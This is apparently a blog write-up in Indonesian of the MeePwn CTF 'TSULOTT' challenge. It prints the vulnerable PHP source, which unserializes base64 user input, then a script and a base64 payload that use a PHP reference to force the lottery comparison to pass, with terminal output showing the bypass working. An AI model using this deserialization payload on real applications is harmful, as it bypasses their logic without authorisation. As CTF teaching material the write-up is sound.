TSULOTT MeePWN Write Up CTF
Diberikan sebuah web.Berikut adalah source code dari web tersebut
<?php
class Object
{
var $jackpot;
var $enter;
}
?>
<?php
include('secret.php');
if(isset($_GET['input']))
{
$obj = unserialize(base64_decode($_GET['input']));
if($obj)
{
$obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
if($obj->enter === $obj->jackpot)
{
echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";
}
else
{
echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
}
}
else
{
echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
} .
else
{
echo "";
}
?>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
$temp = new Object;
$temp->enter=$_GET['gen_code'];
$code=base64_encode(serialize($temp));
echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
show_source(__FILE__);
}
?>
Kita dapat menggunakan php unserialize untuk mengisi jackpot agar sesuai dengan enter. Namun dibawahnya jackpot terisi kembali dengan variabel random sehingga hasil unserialize kita tertimpa.
Setelah event ctf selesai, hasil googling menunjukkan hal yang menarik. Ternyata kita dapat menggunakan reference pada php agar var enter sesuai dengan var jackpot yang kita miliki.
Kita buat serialize object tersebut dengan script php dibawah ini:
<?php
class Object
{
var $jackpot;
var $enter;
}
$exp = new Object;
$exp->enter =& $exp->object;
$a = serialize($exp);
echo serialize($exp).'\n';
echo base64_encode($a)
?>
O:6:"Object":2:{s:7:"jackpot";N;s:5:"enter";R:2;} dengan base64 Tzo2OiJPYmplY3QiOjI6e3M6NzoiamFja3BvdCI7TjtzOjU6ImVudGVyIjtSOjI7fQ==Kita akan coba pada source code berikut.
<?php
class Object
{
var $jackpot;
var $enter;
}
$temp = new Object;
/*$temp->enter=rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99);
$temp->jackpot="90 90 90 90 90 90";
$code = base64_encode(serialize($temp));
$oob = unserialize(base64_decode($code));
echo $code;
echo $oob->enter;
echo $oob->jackpot;*/
$exp = new Object;
#$exp->jackpot = "80 80 80 80 80 80";
#$exp->enter = "80 80 80 80 80 80";
$exp->jackpot =& $exp->enter;
$c = serialize($exp);
$crud = unserialize($c);
$exp->jackpot = rand(10, 99);
echo $exp->jackpot .' '.$exp->enter."\n";
if($exp->jackpot===$exp->enter){
echo 'YOU WIN';
} else{
echo 'YOU LOSE';
}
?>
alfakatsuki@justPC:~$ php is.php
40 40
YOU WIN
alfakatsuki@justPC:~$ php is.php
54 54
YOU WIN
alfakatsuki@justPC:~$ php is.php
90 90
YOU WIN
alfakatsuki@justPC:~$ php is.php
73 73
YOU WIN
alfakatsuki@justPC:~$ php is.php
10 10
YOU WIN
alfakatsuki@justPC:~$ e
mangtab gan tutorialnya
BalasHapus